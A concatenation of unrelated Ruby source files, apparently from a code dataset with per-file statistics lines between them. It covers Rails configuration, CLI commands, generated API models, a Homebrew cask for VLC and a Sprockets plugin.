# Also allows specification of a connection e.g.
# OpenProject::Database.postgresql?(my_connection)
supported_adapters.keys.each do |adapter|
(class << self; self; end).class_eval do
define_method(:"#{adapter.to_s}?") do |connection = self.connection|
send(:name, connection) == adapter
end
end
end
def self.mysql?(_arg = nil)
message = ".mysql? is no longer supported and will always return false. Remove the call."
ActiveSupport::Deprecation.warn message, caller
false
end
# Return the version of the underlying database engine.
# Set the +raw+ argument to true to return the unmangled string
# from the database.
def self.version(raw = false)
@version ||= ActiveRecord::Base.connection.select_value('SELECT version()')
raw ? @version : @version.match(/\APostgreSQL ([\d\.]+)/i)[1]
end
def self.numeric_version
ActiveRecord::Base.connection.select_value('SHOW server_version_num;').to_i
end
# Return if the version of the underlying database engine is capable of TSVECTOR features, needed for full-text
# search.
def self.allows_tsv?
version_matches?
end
end
end
| 34.775862 | 123 | 0.69096 |
e8136039f3b206863f0cbf5ef0b32a3c1fae62fd | 2,863 | module Bosh::Cli::Command
class Snapshot < Base
usage 'snapshots'
desc 'List all snapshots'
def list(job = nil, index = nil)
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
snapshots = director.list_snapshots(deployment_name, job, index)
if snapshots.empty?
nl
say('No snapshots')
nl
return
end
sorted = snapshots.sort do |a, b|
s = a['job'].to_s <=> b['job'].to_s
if a['uuid']
s = a['uuid'].to_i <=> b['uuid'].to_i if s == 0
else
s = a['index'].to_i <=> b['index'].to_i if s == 0
end
s = a['created_at'].to_s <=> b['created_at'].to_s if s == 0
s
end
snapshots_table = table do |t|
t.headings = ['Job/ID', 'Snapshot CID', 'Created at', 'Clean']
sorted.each do |snapshot|
job = "#{snapshot['job'] || 'unknown'}/#{snapshot['uuid'] || 'unknown'} (#{snapshot['index'] || 'unknown'})"
t << [job, snapshot['snapshot_cid'], snapshot['created_at'], snapshot['clean']]
end
end
nl
say(snapshots_table)
nl
say('Snapshots total: %d' % snapshots.size)
end
usage 'take snapshot'
desc 'Takes a snapshot'
def take(job = nil, index = nil)
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
unless job && index
unless confirmed?("Are you sure you want to take a snapshot of all deployment `#{deployment_name}'?")
say('Canceled taking snapshot'.make_green)
return
end
end
status, task_id = director.take_snapshot(deployment_name, job, index)
task_report(status, task_id, 'Snapshot taken')
end
usage 'delete snapshot'
desc 'Deletes a snapshot'
def delete(snapshot_cid)
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
unless confirmed?("Are you sure you want to delete snapshot `#{snapshot_cid}'?")
say('Canceled deleting snapshot'.make_green)
return
end
status, task_id = director.delete_snapshot(deployment_name, snapshot_cid)
task_report(status, task_id, "Deleted Snapshot `#{snapshot_cid}'")
end
usage 'delete snapshots'
desc 'Deletes all snapshots of a deployment'
def delete_all
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
unless confirmed?("Are you sure you want to delete all snapshots of deployment `#{deployment_name}'?")
say('Canceled deleting snapshots'.make_green)
return
end
status, task_id = director.delete_all_snapshots(deployment_name)
task_report(status, task_id, "Deleted all snapshots of deployment `#{deployment_name}'")
end
end
end
| 28.919192 | 118 | 0.623472 |
189eaa4e1dcf8af996a4801c9b4a9fcf7d68dc77 | 1,812 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
class Authorization::UserRolesQuery < Authorization::AbstractUserQuery
self.model = Role
self.base_table = users_table
def self.query(*args)
arel = transformed_query(*args)
model.where(roles_table[:id].in(arel))
end
transformations.register :all, :roles_join do |statement|
statement.outer_join(roles_table)
.on(roles_member_roles_join)
end
transformations.register :all, :project do |statement|
statement.project(roles_table[:id])
end
def self.roles_member_roles_join
roles_table[:id].eq(member_roles_table[:role_id])
end
end
| 34.188679 | 91 | 0.752759 |
01e437f3e997c04f4a6caf7bcb7f713764e6cc4d | 298 | # frozen_string_literal: true
class Course::LessonPlan::Milestone < ActiveRecord::Base
belongs_to :course, inverse_of: :lesson_plan_milestones
def initialize_duplicate(duplicator, other)
self.start_at += duplicator.time_shift
self.course = duplicator.duplicate(other.course)
end
end
| 29.8 | 57 | 0.788591 |
21f8ec2e45552eeeaf43293c38a33028a1a6c43b | 85 | # desc "Explaining what the task does"
# task :matanza2 do
# # Task goes here
# end | 21.25 | 38 | 0.682353 |
edf603fc0acaeff85a1c04b5fb0ea259a477a194 | 3,585 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "new_sample_app_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.206897 | 102 | 0.759554 |
bf149191c794aadd42aa8d251867703c511e100c | 11,180 | =begin
#NSX-T Manager API
#VMware NSX-T Manager REST API
OpenAPI spec version: 2.3.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.3.1
=end
require 'date'
module NSXT
# LACP group
class Lag
# uplink names
attr_accessor :uplinks
# Lag name
attr_accessor :name
# number of uplinks
attr_accessor :number_of_uplinks
# LACP timeout type
attr_accessor :timeout_type
# LACP load balance Algorithm
attr_accessor :load_balance_algorithm
# unique id
attr_accessor :id
# LACP group mode
attr_accessor :mode
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'uplinks' => :'uplinks',
:'name' => :'name',
:'number_of_uplinks' => :'number_of_uplinks',
:'timeout_type' => :'timeout_type',
:'load_balance_algorithm' => :'load_balance_algorithm',
:'id' => :'id',
:'mode' => :'mode'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'uplinks' => :'Array<Uplink>',
:'name' => :'String',
:'number_of_uplinks' => :'Integer',
:'timeout_type' => :'String',
:'load_balance_algorithm' => :'String',
:'id' => :'String',
:'mode' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'uplinks')
if (value = attributes[:'uplinks']).is_a?(Array)
self.uplinks = value
end
end
if attributes.has_key?(:'name')
self.name = attributes[:'name']
end
if attributes.has_key?(:'number_of_uplinks')
self.number_of_uplinks = attributes[:'number_of_uplinks']
end
if attributes.has_key?(:'timeout_type')
self.timeout_type = attributes[:'timeout_type']
else
self.timeout_type = "SLOW"
end
if attributes.has_key?(:'load_balance_algorithm')
self.load_balance_algorithm = attributes[:'load_balance_algorithm']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'mode')
self.mode = attributes[:'mode']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @name.nil?
invalid_properties.push("invalid value for 'name', name cannot be nil.")
end
if @number_of_uplinks.nil?
invalid_properties.push("invalid value for 'number_of_uplinks', number_of_uplinks cannot be nil.")
end
if @number_of_uplinks > 32
invalid_properties.push("invalid value for 'number_of_uplinks', must be smaller than or equal to 32.")
end
if @number_of_uplinks < 2
invalid_properties.push("invalid value for 'number_of_uplinks', must be greater than or equal to 2.")
end
if @load_balance_algorithm.nil?
invalid_properties.push("invalid value for 'load_balance_algorithm', load_balance_algorithm cannot be nil.")
end
if @mode.nil?
invalid_properties.push("invalid value for 'mode', mode cannot be nil.")
end
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @name.nil?
return false if @number_of_uplinks.nil?
return false if @number_of_uplinks > 32
return false if @number_of_uplinks < 2
timeout_type_validator = EnumAttributeValidator.new('String', ["SLOW", "FAST"])
return false unless timeout_type_validator.valid?(@timeout_type)
return false if @load_balance_algorithm.nil?
load_balance_algorithm_validator = EnumAttributeValidator.new('String', ["SRCMAC", "DESTMAC", "SRCDESTMAC", "SRCDESTIPVLAN", "SRCDESTMACIPPORT"])
return false unless load_balance_algorithm_validator.valid?(@load_balance_algorithm)
return false if @mode.nil?
mode_validator = EnumAttributeValidator.new('String', ["ACTIVE", "PASSIVE"])
return false unless mode_validator.valid?(@mode)
return true
end
# Custom attribute writer method with validation
# @param [Object] number_of_uplinks Value to be assigned
def number_of_uplinks=(number_of_uplinks)
if number_of_uplinks.nil?
fail ArgumentError, "number_of_uplinks cannot be nil"
end
if number_of_uplinks > 32
fail ArgumentError, "invalid value for 'number_of_uplinks', must be smaller than or equal to 32."
end
if number_of_uplinks < 2
fail ArgumentError, "invalid value for 'number_of_uplinks', must be greater than or equal to 2."
end
@number_of_uplinks = number_of_uplinks
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] timeout_type Object to be assigned
def timeout_type=(timeout_type)
validator = EnumAttributeValidator.new('String', ["SLOW", "FAST"])
unless validator.valid?(timeout_type)
fail ArgumentError, "invalid value for 'timeout_type', must be one of #{validator.allowable_values}."
end
@timeout_type = timeout_type
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] load_balance_algorithm Object to be assigned
def load_balance_algorithm=(load_balance_algorithm)
validator = EnumAttributeValidator.new('String', ["SRCMAC", "DESTMAC", "SRCDESTMAC", "SRCDESTIPVLAN", "SRCDESTMACIPPORT"])
unless validator.valid?(load_balance_algorithm)
fail ArgumentError, "invalid value for 'load_balance_algorithm', must be one of #{validator.allowable_values}."
end
@load_balance_algorithm = load_balance_algorithm
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] mode Object to be assigned
def mode=(mode)
validator = EnumAttributeValidator.new('String', ["ACTIVE", "PASSIVE"])
unless validator.valid?(mode)
fail ArgumentError, "invalid value for 'mode', must be one of #{validator.allowable_values}."
end
@mode = mode
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
uplinks == o.uplinks &&
name == o.name &&
number_of_uplinks == o.number_of_uplinks &&
timeout_type == o.timeout_type &&
load_balance_algorithm == o.load_balance_algorithm &&
id == o.id &&
mode == o.mode
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[uplinks, name, number_of_uplinks, timeout_type, load_balance_algorithm, id, mode].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXT.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 31.142061 | 151 | 0.636404 |
4a152d0c08de37aecbe8084aa46cf88ae96e99ff | 270 | require 'spec_helper'
describe '::cassandra::params' do
let :facts do
{
osfamily: 'RedHat',
operatingsystemmajrelease: 7
}
end
it do
should compile
should contain_class('cassandra::params')
should have_resource_count(0)
end
end
| 15.882353 | 45 | 0.662963 |
ed5c60d3666154e6634fe3fc89bb3944988712aa | 169 | # Set up the load path.
lib = File.expand_path(File.dirname(__FILE__))
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "wax/version"
require "wax/main"
| 24.142857 | 55 | 0.757396 |
f8507669bcc0c91200667255f07f8bfe94706634 | 3,282 |
module Nucleon
module Util
class Cache < Core
@@cache_lock = Mutex.new
#-----------------------------------------------------------------------------
# This class already inherits much of what we need from the core config class.
# Right now we just have to worry about persistence
#-----------------------------------------------------------------------------
# Constructor / Destructor
def initialize(root_path, id, cache_dir = '.cache', force = true)
super({}, {}, force)
@cache_dir = cache_dir
@cache_root = File.join(root_path, cache_dir)
FileUtils.mkdir_p(base_path) unless File.directory?(base_path)
@cache_id = id.to_sym
@cache_translator = Nucleon.type_default(:nucleon, :translator)
@cache_filename = "#{id}.#{translator}"
@cache_path = File.join(@cache_root, @cache_filename)
load
end
#-----------------------------------------------------------------------------
# Property accessors / modifiers
def status
@status
end
#---
def base_path
@cache_root
end
#---
def directory_name
@cache_dir
end
#---
def id
@cache_id
end
#---
def translator
@cache_translator
end
#---
def file
@cache_path
end
#---
def get(keys, default = nil, format = false)
result = super(keys, nil)
if result.nil?
load
result = super(keys, nil)
end
result = filter(default, format) if result.nil?
result
end
#---
def set(keys, value, delete_nil = false)
result = super
save if initialized?
result
end
#---
def delete(keys, default = nil)
result = super
save if initialized?
result
end
#---
def clear
result = super
save if initialized?
result
end
#-----------------------------------------------------------------------------
# Operations
def import_base(properties, options = {})
config = Config.ensure(options)
result = super
save if initialized? && ! config.get(:no_save, false)
result
end
#---
def load
success = false
@status = 255
@@cache_lock.synchronize do
logger.info("Loading #{translator} translated cache from #{file}")
parser = CORL.translator({}, translator)
raw = Disk.read(file)
if parser && raw && ! raw.empty?
logger.debug("Cache file contents: #{raw}")
parse_properties = Data.hash(parser.parse(raw))
Nucleon.remove_plugin(parser)
import(parse_properties, { :no_save => true }) unless parse_properties.empty?
success = true
@status = Nucleon.code.success
end
end
success
end
protected :load
#---
def save
success = false
@status = 255
@@cache_lock.synchronize do
if renderer = CORL.translator({}, translator)
rendering = renderer.generate(export)
Nucleon.remove_plugin(renderer)
if Disk.write(file, rendering)
success = true
@status = Nucleon.code.success
end
end
end
success
end
protected :save
end
end
end
| 19.652695 | 85 | 0.519805 |
5d6819506e085250d525e250b15efac7e0b3aab1 | 1,361 | cask 'vlc' do
version '2.2.4'
sha256 'fd071b9817c9efccac5a144d69893a4a5323cbde4a74d5691c3cf3ab979d4160'
url "https://get.videolan.org/vlc/#{version}/macosx/vlc-#{version}.dmg"
appcast 'http://update.videolan.org/vlc/sparkle/vlc-intel64.xml',
checkpoint: '0e71dfa9874979a8a9e6a9a3a7fdd21366a92082bce2836cbd938186ad5945fa'
name 'VLC media player'
homepage 'https://www.videolan.org/vlc/'
license :oss
gpg "#{url}.asc",
key_id: '65f7c6b4206bd057a7eb73787180713be58d1adc'
app 'VLC.app'
# shim script (https://github.com/caskroom/homebrew-cask/issues/18809)
shimscript = "#{staged_path}/vlcwrapper"
binary shimscript, target: 'vlc'
preflight do
File.open(shimscript, 'w') do |f|
f.puts '#!/bin/bash'
f.puts "#{appdir}/VLC.app/Contents/MacOS/VLC \"$@\""
FileUtils.chmod '+x', f
end
end
zap delete: [
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/org.videolan.vlc.sfl',
'~/Library/Application Support/org.videolan.vlc',
'~/Library/Preferences/org.videolan.vlc',
'~/Library/Preferences/org.videolan.vlc.plist',
'~/Library/Saved Application State/org.videolan.vlc.savedState',
'~/Library/Caches/org.videolan.vlc',
]
end
| 37.805556 | 148 | 0.669361 |
91de0f13bab678baf08ddeb5f59f0c3528a45a3c | 278 | require 'sidekiq/web'
Rails.application.routes.draw do
resources :txns
root to: 'pages#home'
resources :banks
resources :users
mount Sidekiq::Web => '/sidekiq'
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
end
| 25.272727 | 102 | 0.741007 |
5d468ff7867482bf7dff860e5a5be9fb77f5428d | 804 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe ZPNG::Metadata do
# itxt.png contains all possible text chunks
describe "itxt.png" do
let!(:metadata){
ZPNG::Image.load( File.join(SAMPLES_DIR, "itxt.png") ).metadata
}
it "should get all values" do
metadata.size.should == 4
end
it "should not find not existing value" do
metadata['foobar'].should be_nil
end
it "should find all existing values" do
metadata['Title'].should == "PNG"
metadata['Author'].should == "La plume de ma tante"
metadata['Warning'].should == "Es is verboten, um diese Datei in das GIF-Bildformat\numzuwandeln. Sie sind gevarnt worden."
metadata['Description'].should =~ /Since POV-Ray does not direclty support/
end
end
end
| 34.956522 | 130 | 0.674129 |
798ebfa4507445e6efb0b4a41169f191b79a7352 | 646 | class DeviseInvitable::RegistrationsController < Devise::RegistrationsController
protected
def build_resource(hash = nil)
hash ||= resource_params || {}
if hash[:email]
self.resource = resource_class.where(:email => hash[:email]).first
if self.resource && self.resource.respond_to?(:invited_to_sign_up?) && self.resource.invited_to_sign_up?
self.resource.attributes = hash
self.resource.send_confirmation_instructions if self.resource.confirmation_required_for_invited?
self.resource.accept_invitation
else
self.resource = nil
end
end
self.resource ||= super
end
end
| 34 | 110 | 0.713622 |
91d18e548cb848941b9831bbdaa7807acf0b75ca | 998 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_03_26_154008) do
create_table "tweets", force: :cascade do |t|
t.string "content"
t.integer "user_id"
end
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password_digest"
end
end
| 36.962963 | 86 | 0.759519 |
39f8940978007a000dc682ee9f7f5518a28756a5 | 592 | require 'byebug'
post '/friendships' do
current_user.friendships.create(:friend_id => params[:friend_id])
redirect '/'
end
post '/destroyfriendships' do
if current_user.friends.where(id: params[:friend_id]) == []
friendship_to_be_destroyed =Friendship.where(friend_id: params[:current_user_id], user_id: params[:friend_id]).first
Friendship.destroy(friendship_to_be_destroyed.id)
else
friendship_to_be_destroyed= Friendship.where(user_id: params[:current_user_id], friend_id:params[:friend_id]).first
Friendship.destroy(friendship_to_be_destroyed.id)
end
redirect '/'
end | 25.73913 | 118 | 0.785473 |
abe3b5d1e579661c2cd0f80d1dfa8829843f149f | 143 | class AddPictureToIrbSelections < ActiveRecord::Migration
def change
add_attachment :irb_selections_pictures, :picture
end
end
| 23.833333 | 57 | 0.769231 |
f8db957df80e887054b4b2f24fd38a9700cb3eaf | 2,733 | describe UseCase::UpdateAssessmentStatus do
include RSpecRegisterApiServiceMixin
scheme_id = nil
subject(:use_case) do
described_class.new(
assessments_gateway: assessments_gateway,
assessments_search_gateway: assessments_search_gateway,
assessors_gateway: Gateway::AssessorsGateway.new,
event_broadcaster: Events::Broadcaster.new,
)
end
let(:assessments_gateway) { Gateway::AssessmentsGateway.new }
let(:assessments_search_gateway) { Gateway::AssessmentsSearchGateway.new }
let(:assessment) do
assessments_search_gateway.search_by_assessment_id(
"0000-0000-0000-0000-0000",
restrictive: false,
).first
end
let(:linked_assessment) do
assessments_search_gateway.search_by_assessment_id(
"0000-0000-0000-0000-0001",
restrictive: false,
).first
end
before(:all) do
scheme_id = add_scheme_and_get_id
add_super_assessor(scheme_id: scheme_id)
cepc_schema = "CEPC-8.0.0".freeze
cepc_xml = Nokogiri.XML Samples.xml(cepc_schema, "cepc+rr")
call_lodge_assessment(scheme_id: scheme_id, schema_name: cepc_schema, xml_document: cepc_xml)
end
context "when calling update_statuses" do
before do
use_case.execute("0000-0000-0000-0000-0000", "CANCELLED", [scheme_id])
end
it "cancels the first assessment" do
expect(assessment.get("cancelled_at")).not_to be_nil
end
it "cancels the linked assessment" do
expect(linked_assessment.get("cancelled_at")).not_to be_nil
end
end
context "when one half of a linked pair is already cancelled" do
before do
assessments_gateway.update_statuses(
%w[0000-0000-0000-0000-0001],
"cancelled_at",
Time.now.to_s,
)
end
it "cancels the uncancelled certificate" do
use_case.execute("0000-0000-0000-0000-0000", "CANCELLED", [scheme_id])
expect(assessment.get("cancelled_at")).not_to be_nil
end
end
describe "event broadcasting" do
around do |test|
Events::Broadcaster.enable!
test.run
Events::Broadcaster.disable!
end
context "when an assessment is cancelled" do
it "broadcasts an assessment_cancelled event" do
expect { use_case.execute("0000-0000-0000-0000-0000", "CANCELLED", [scheme_id]) }.to broadcast(:assessment_cancelled, assessment_id: "0000-0000-0000-0000-0000")
end
end
context "when an assessment is marked not for issue" do
it "broadcasts an assessment_marked_not_for_issue event" do
expect { use_case.execute("0000-0000-0000-0000-0000", "NOT_FOR_ISSUE", [scheme_id]) }.to broadcast(:assessment_marked_not_for_issue, assessment_id: "0000-0000-0000-0000-0000")
end
end
end
end
| 30.366667 | 183 | 0.712404 |
1caa0c78bfa2b90a7dd8f5cedb23adfed4153d89 | 1,890 | Pod::Spec.new do |s|
s.name = 'sReto'
s.version = '3.0.0'
s.summary = 'P2P Framework for realtime collaboration in Swift with independent modules for WLAN, Bluetooth and Remote support'
s.homepage = 'https://github.com/ls1intum/sReto'
s.license = 'MIT'
s.author = { 'Chair for Applied Software Engineering' => '[email protected]' }
s.social_media_url = 'https://twitter.com/ls1intum'
s.requires_arc = true
s.ios.deployment_target = '11.3'
s.osx.deployment_target = '10.13.4'
s.swift_version = '4.1'
s.source = { :git => 'https://github.com/workingDog/sReto.git', :tag => s.version }
s.default_subspec = 'WlanModule'
s.subspec 'Core' do |c|
c.source_files = 'Source/sReto/Core/**/*.swift'
end
s.subspec 'Bonjour' do |b|
b.source_files = 'Source/sReto/Modules/Bonjour/**/*.swift'
b.dependency 'sReto/Core'
b.dependency 'CocoaAsyncSocket', '7.6.3'
end
s.subspec 'WlanModule' do |wm|
wm.source_files = 'Source/sReto/Modules/WlanModule/*.swift'
wm.dependency 'sReto/Bonjour'
end
s.subspec 'BluetoothModule' do |bm|
bm.source_files = 'Source/sReto/Modules/BluetoothModule/*.swift'
bm.dependency 'sReto/Bonjour'
bm.dependency 'sReto/no-arc'
end
s.subspec 'RemoteModule' do |rm|
rm.source_files = 'Source/sReto/Modules/RemoteModule/**/*.swift'
rm.dependency 'sReto/Core'
rm.dependency 'SocketRocket', '0.5.1'
end
s.subspec 'AllModules' do |am|
am.dependency 'sReto/RemoteModule'
am.dependency 'sReto/WlanModule'
am.dependency 'sReto/BluetoothModule'
end
s.subspec 'no-arc' do |n|
n.source_files = 'Source/sReto/Modules/BluetoothModule/DNSSD/*'
n.requires_arc = false
end
end
| 32.586207 | 140 | 0.61164 |
87c4392fa259742eedc50e4f3d61f1a0e0dc640e | 764 | module Aviator
define_request :get_default_quotas, inherit: [:openstack, :common, :v2, :admin, :base] do
meta :service, :volume
meta :api_version, :v2
link 'documentation',
'http://docs.openstack.org/trunk/openstack-ops/content/projects_users.html'
link 'documentation',
'https://github.com/openstack/python-cinderclient/blob/master/cinderclient/v2/quotas.py'
param :tenant_id, required: true
def headers
super
end
def http_method
:get
end
def url
service_spec = session_data[:access][:serviceCatalog].find{|s| s[:type] == 'volumev2' }
v2_url = service_spec[:endpoints][0][:adminURL]
"#{ v2_url }/os-quota-sets/#{ params[:tenant_id] }/defaults"
end
end
end | 22.470588 | 94 | 0.65445 |
d5501c15bc35e3f4ee11c4d8edf57f7a1e43babe | 391 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_07_01
module Models
#
# Defines values for FirewallPolicyNatRuleCollectionActionType
#
module FirewallPolicyNatRuleCollectionActionType
DNAT = "DNAT"
end
end
end
| 24.4375 | 70 | 0.744246 |
38e4437a91582d78b3e19228985642e27459eec5 | 1,134 | require 'sprockets'
require 'sprockets/htmlimports/patches/asset_attributes'
require 'sprockets/htmlimports/patches/base'
require 'sprockets/htmlimports/patches/compressing'
require 'sprockets/htmlimports/patches/context'
require 'sprockets/htmlimports/base_processor'
require 'sprockets/htmlimports/bundle_reprocessor'
require 'sprockets/htmlimports/postprocessor'
require 'sprockets/htmlimports/simple_html_compressor'
require 'sprockets/htmlimports/wrapped_asset'
Sprockets.register_mime_type 'text/html', '.html'
Sprockets.register_postprocessor 'text/html', Sprockets::HTMLImports::Postprocessor
Sprockets.register_bundle_processor 'text/html', Sprockets::HTMLImports::BundleReprocessor
Sprockets.register_compressor 'text/html', :simple, Sprockets::HTMLImports::SimpleHTMLCompressor
begin
require 'action_view'
rescue LoadError
end
if defined? ::ActionView
require 'sprockets/htmlimports/action_view/asset_tag_helper'
require 'sprockets/htmlimports/action_view/asset_url_helper'
end
begin
require 'rails/railtie'
rescue LoadError
end
if defined? ::Rails::Railtie
require 'sprockets/htmlimports/rails/railtie'
end
| 32.4 | 96 | 0.840388 |
181b46161b49c4307f0ad6fd907744d7034618ba | 1,361 | # encoding: UTF-8
module Lambit
module Aws
module CloudWatch
class Alarm
OPTIONS = [
:alarm_name,
:alarm_description,
:actions_enabled,
:ok_actions,
:alarm_actions,
:insufficient_data_actions,
:metric_name,
:namespace,
:statistic,
